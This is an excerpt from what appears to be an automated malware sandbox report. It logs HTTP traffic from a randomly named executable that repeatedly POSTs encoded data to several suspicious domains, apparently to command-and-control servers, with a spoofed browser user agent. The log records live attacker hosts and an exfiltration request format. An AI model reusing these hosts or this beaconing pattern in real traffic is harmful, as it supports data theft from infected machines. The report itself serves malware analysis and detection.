                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 2f 39 49 2b 44 54 30 69 59 57 63 50 2b 41 51 6f 76 6c 37 4f 79 2b 56 45 34 63 4f 77 4f 41 37 49 56 56 6f 36 33 52 59 73 54 32 31 31 6c 66 4d 39 68 49 4b 43 4f 51 6e 73 70 57 4d 70 6d 32 79 67 36 7a 47 30 75 33 4d 52 51 43 6b 63 47 41 7a 7a 5a 76 73 62 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u/9I+DT0iYWcP+AQovl7Oy+VE4cOwOA7IVVo63RYsT211lfM9hIKCOQnspWMpm2yg6zG0u3MRQCkcGAzzZvsbA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:27:33.552799940 CEST591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTdkOTg2YTctN2RiMy00ZmJjLTlmZjgtNTVmNjRiOWRjOTBlIiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    42192.168.2.557233199.59.243.226802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:27:35.625698090 CEST740OUTPOST /ssw0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.cacingnaga36.click
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.cacingnaga36.click
                                                    Referer: http://www.cacingnaga36.click/ssw0/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 4a 55 36 57 62 47 78 2b 58 51 4b 38 67 32 6d 4f 61 38 71 2f 78 6d 33 56 45 79 62 41 68 64 48 52 32 71 32 43 49 53 77 55 79 5a 4e 5a 4e 57 34 75 4d 44 6e 53 47 32 53 30 59 4b 30 67 41 6c 70 57 6a 36 65 61 39 45 43 75 34 34 57 50 72 64 36 70 4e 2b 7a 4a 63 37 68 6f 69 2f 52 65 2f 31 63 35 54 2b 66 2b 79 79 67 74 4c 55 6a 48 6c 39 6f 33 71 6d 67 37 4c 4d 67 50 71 6e 72 43 46 34 74 36 53 53 50 78 42 50 69 76 5a 42 52 41 79 38 45 63 73 68 2f 65 65 65 79 75 58 44 37 53 58 72 37 7a 64 53 76 2b 55 6b 54 34 6a 55 53 6d 6d 42 6e 4f 72 4b 54 5a 46 6e 79 75 64 43 54 41 62 67 62 6d 54 31 43 79 41 44 65 4f 59 38 76 41 75 6b 4f 6e 33 65 6a 49 31 53 46 6b 67 43 4e 42
                                                    Data Ascii: V6h=JU6WbGx+XQK8g2mOa8q/xm3VEybAhdHR2q2CISwUyZNZNW4uMDnSG2S0YK0gAlpWj6ea9ECu44WPrd6pN+zJc7hoi/Re/1c5T+f+yygtLUjHl9o3qmg7LMgPqnrCF4t6SSPxBPivZBRAy8Ecsh/eeeyuXD7SXr7zdSv+UkT4jUSmmBnOrKTZFnyudCTAbgbmT1CyADeOY8vAukOn3ejI1SFkgCNB
                                                    Sep 5, 2024 14:27:36.110003948 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:35 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1138
                                                    x-request-id: 153569f9-e0b6-4531-a87c-c4338f5fe676
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u/9I+DT0iYWcP+AQovl7Oy+VE4cOwOA7IVVo63RYsT211lfM9hIKCOQnspWMpm2yg6zG0u3MRQCkcGAzzZvsbA==
                                                    set-cookie: parking_session=153569f9-e0b6-4531-a87c-c4338f5fe676; expires=Thu, 05 Sep 2024 12:42:36 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 2f 39 49 2b 44 54 30 69 59 57 63 50 2b 41 51 6f 76 6c 37 4f 79 2b 56 45 34 63 4f 77 4f 41 37 49 56 56 6f 36 33 52 59 73 54 32 31 31 6c 66 4d 39 68 49 4b 43 4f 51 6e 73 70 57 4d 70 6d 32 79 67 36 7a 47 30 75 33 4d 52 51 43 6b 63 47 41 7a 7a 5a 76 73 62 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u/9I+DT0iYWcP+AQovl7Oy+VE4cOwOA7IVVo63RYsT211lfM9hIKCOQnspWMpm2yg6zG0u3MRQCkcGAzzZvsbA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:27:36.110493898 CEST591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTUzNTY5ZjktZTBiNi00NTMxLWE4N2MtYzQzMzhmNWZlNjc2IiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    43192.168.2.557234199.59.243.226802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:27:38.170308113 CEST1757OUTPOST /ssw0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.cacingnaga36.click
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.cacingnaga36.click
                                                    Referer: http://www.cacingnaga36.click/ssw0/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 4a 55 36 57 62 47 78 2b 58 51 4b 38 67 32 6d 4f 61 38 71 2f 78 6d 33 56 45 79 62 41 68 64 48 52 32 71 32 43 49 53 77 55 79 5a 46 5a 4e 6b 77 75 65 79 6e 53 48 32 53 30 56 71 31 6e 41 6c 70 50 6a 36 47 57 39 45 4f 51 34 2b 61 50 70 2b 43 70 4c 4b 6e 4a 58 37 68 6f 74 66 52 66 37 31 63 6f 54 36 36 33 79 32 41 74 4c 55 6a 48 6c 37 55 33 6a 58 67 37 4a 4d 67 4f 38 33 72 65 55 6f 74 53 53 53 58 4c 42 50 33 59 59 78 78 41 79 63 55 63 76 54 6e 65 57 65 79 73 51 44 36 42 58 72 33 77 64 53 79 50 55 67 54 53 6a 54 65 6d 77 6e 6d 53 7a 35 53 46 51 48 32 69 65 54 54 56 62 31 2f 6f 61 55 2b 79 43 51 4f 33 59 75 76 52 2b 68 53 38 39 76 50 48 72 45 6c 4c 6f 56 59 77 75 37 48 4d 68 50 69 37 43 67 30 36 33 79 43 30 6b 73 4a 69 69 4e 72 46 6c 79 42 4a 6a 6e 70 66 79 37 55 46 2f 55 52 4a 73 55 6b 4f 72 44 45 66 51 56 77 7a 65 4d 54 43 4b 64 41 71 2f 51 4f 48 49 34 4d 6c 4a 76 38 47 73 71 61 53 39 76 58 2f 65 69 47 6b 4b 77 30 57 43 34 51 71 6b 4d 48 4a 6e 38 41 4a 66 6b 67 51 68 6c 41 59 4a 4b 66 5a 4d 77 [TRUNCATED]
                                                    Data Ascii: V6h=JU6WbGx+XQK8g2mOa8q/xm3VEybAhdHR2q2CISwUyZFZNkwueynSH2S0Vq1nAlpPj6GW9EOQ4+aPp+CpLKnJX7hotfRf71coT663y2AtLUjHl7U3jXg7JMgO83reUotSSSXLBP3YYxxAycUcvTneWeysQD6BXr3wdSyPUgTSjTemwnmSz5SFQH2ieTTVb1/oaU+yCQO3YuvR+hS89vPHrElLoVYwu7HMhPi7Cg063yC0ksJiiNrFlyBJjnpfy7UF/URJsUkOrDEfQVwzeMTCKdAq/QOHI4MlJv8GsqaS9vX/eiGkKw0WC4QqkMHJn8AJfkgQhlAYJKfZMwMGyTFDx+3VFE/THtQ958m6Wv36r+aRbkIXX+tUK4ox2RdTFNIbaBLsW2Wqz0JROQxd7Z3UK3/vy9QdUcH2lTt7I4Bq3LhAJyxevxIM/WYIwIlluli36DFTvWiCXZxLYaDk15yV30ImaZu6g3ulBCXi3BT6KyQbJllLWG7/yQ+WqQAV3s9qOScogqscwD2MalG+qk1jTTqQWkHLChcFqaQSEe9/c/3x87saVxnGN5Eo0f8qjxqU0VoDo8LHzgo82xlS5uClZS3Pgyi5OPgVr63Y8AtTmjvIQjqZ3JfeIDq53a01ezJnBlUHSBRGJ0jpSAAKh2kVE6Si+wVW5zB8wsOFHP1Ubd9hxP1UptXuBJX8KuuuJXq7jbU5DrVBzQbsLiSPANnIwzQr9N4HXtzqMQ2mYn7Y81JoNaF5oeviBI0H2LVocfHQZRWnmiQUE9th+KoCXbPkhuzdHBYNW9s2rfUFcSF5tSSC/+UEeJo4ZT85EVMdCihC28s5UvkZ5qec6ElFf00lgpm/VTONY1j9gEbCfLg5o46VgCr3mbSGEGjjrMWzDHo6MdstDBqV4QG0PwKDF618xQU25H7DlWXZTYGufZwXyxENW86IalY7nfljIpOOIqVE5ZApFo+oajucqQcHBwANEYWuJnIDa7iRhEEulldGhvubCGUD [TRUNCATED]
                                                    Sep 5, 2024 14:27:38.652837992 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:37 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1138
                                                    x-request-id: 757930bf-d9a9-4d20-aa0d-ef6517632529
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u/9I+DT0iYWcP+AQovl7Oy+VE4cOwOA7IVVo63RYsT211lfM9hIKCOQnspWMpm2yg6zG0u3MRQCkcGAzzZvsbA==
                                                    set-cookie: parking_session=757930bf-d9a9-4d20-aa0d-ef6517632529; expires=Thu, 05 Sep 2024 12:42:38 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 2f 39 49 2b 44 54 30 69 59 57 63 50 2b 41 51 6f 76 6c 37 4f 79 2b 56 45 34 63 4f 77 4f 41 37 49 56 56 6f 36 33 52 59 73 54 32 31 31 6c 66 4d 39 68 49 4b 43 4f 51 6e 73 70 57 4d 70 6d 32 79 67 36 7a 47 30 75 33 4d 52 51 43 6b 63 47 41 7a 7a 5a 76 73 62 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u/9I+DT0iYWcP+AQovl7Oy+VE4cOwOA7IVVo63RYsT211lfM9hIKCOQnspWMpm2yg6zG0u3MRQCkcGAzzZvsbA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:27:38.652857065 CEST591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzU3OTMwYmYtZDlhOS00ZDIwLWFhMGQtZWY2NTE3NjMyNTI5IiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    44192.168.2.557235199.59.243.226802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:27:40.715140104 CEST453OUTGET /ssw0/?V6h=EWS2YwJnJiunoUuFc/7D9RbaJ3v4wM/73ZiSCzwa3KkaAEYrAxr2MHaEXaA/BV5/vIbe5XGczNGh+M2iNsrtVcMRpqBE9VdECLv8jlI9PFfIoqokrAMGKtNOgnbIBrYWGQ==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.cacingnaga36.click
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:27:41.175417900 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:40 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1514
                                                    x-request-id: 8941a0cf-b407-4c0b-917a-5a89df90e72b
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tw+b0uDS7S9ov7Mr2xZBdYCvgHdYca71/64PfR7jKpOVyZTg7gU8z6e3VTTui3DgkKWb1AvJCbm9M69xRuDOdw==
                                                    set-cookie: parking_session=8941a0cf-b407-4c0b-917a-5a89df90e72b; expires=Thu, 05 Sep 2024 12:42:41 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 77 2b 62 30 75 44 53 37 53 39 6f 76 37 4d 72 32 78 5a 42 64 59 43 76 67 48 64 59 63 61 37 31 2f 36 34 50 66 52 37 6a 4b 70 4f 56 79 5a 54 67 37 67 55 38 7a 36 65 33 56 54 54 75 69 33 44 67 6b 4b 57 62 31 41 76 4a 43 62 6d 39 4d 36 39 78 52 75 44 4f 64 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tw+b0uDS7S9ov7Mr2xZBdYCvgHdYca71/64PfR7jKpOVyZTg7gU8z6e3VTTui3DgkKWb1AvJCbm9M69xRuDOdw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:27:41.175461054 CEST967INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODk0MWEwY2YtYjQwNy00YzBiLTkxN2EtNWE4OWRmOTBlNzJiIiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    45192.168.2.557236199.59.243.226802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:27:49.244653940 CEST457OUTGET /wuux/?sH=nVVHdDTx2PSTVJ&V6h=G8W1V2+ngxJ+E83/0IyfiXupIqoHasoRgPgAY3+/EHQIvd2Wul84Lo8VWixQDtg5AMG3Phy0eNTP33PkrrD0t0eGx0WSmGJ1HH0cwOwxD95TaQSaBMeTfZ443OH1gA0wDQ== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.whiskeydecanterset.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:27:49.708673954 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:48 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1522
                                                    x-request-id: 0f5c48c8-e287-40c8-8918-684fe455930c
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_K7P5yx6HRAV+XcWEYWP6kd6LFXOozqvCLo7Kwaf3x1KcozZ2Sablk4NfjRyA4M+y5VZ6JcX1iTOKWFosnbgFag==
                                                    set-cookie: parking_session=0f5c48c8-e287-40c8-8918-684fe455930c; expires=Thu, 05 Sep 2024 12:42:49 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4b 37 50 35 79 78 36 48 52 41 56 2b 58 63 57 45 59 57 50 36 6b 64 36 4c 46 58 4f 6f 7a 71 76 43 4c 6f 37 4b 77 61 66 33 78 31 4b 63 6f 7a 5a 32 53 61 62 6c 6b 34 4e 66 6a 52 79 41 34 4d 2b 79 35 56 5a 36 4a 63 58 31 69 54 4f 4b 57 46 6f 73 6e 62 67 46 61 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_K7P5yx6HRAV+XcWEYWP6kd6LFXOozqvCLo7Kwaf3x1KcozZ2Sablk4NfjRyA4M+y5VZ6JcX1iTOKWFosnbgFag==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:27:49.709034920 CEST975INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGY1YzQ4YzgtZTI4Ny00MGM4LTg5MTgtNjg0ZmU0NTU5MzBjIiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    46192.168.2.55723772.52.178.23802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:27:54.728523970 CEST708OUTPOST /f1qc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.4odagiyn.click
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.4odagiyn.click
                                                    Referer: http://www.4odagiyn.click/f1qc/
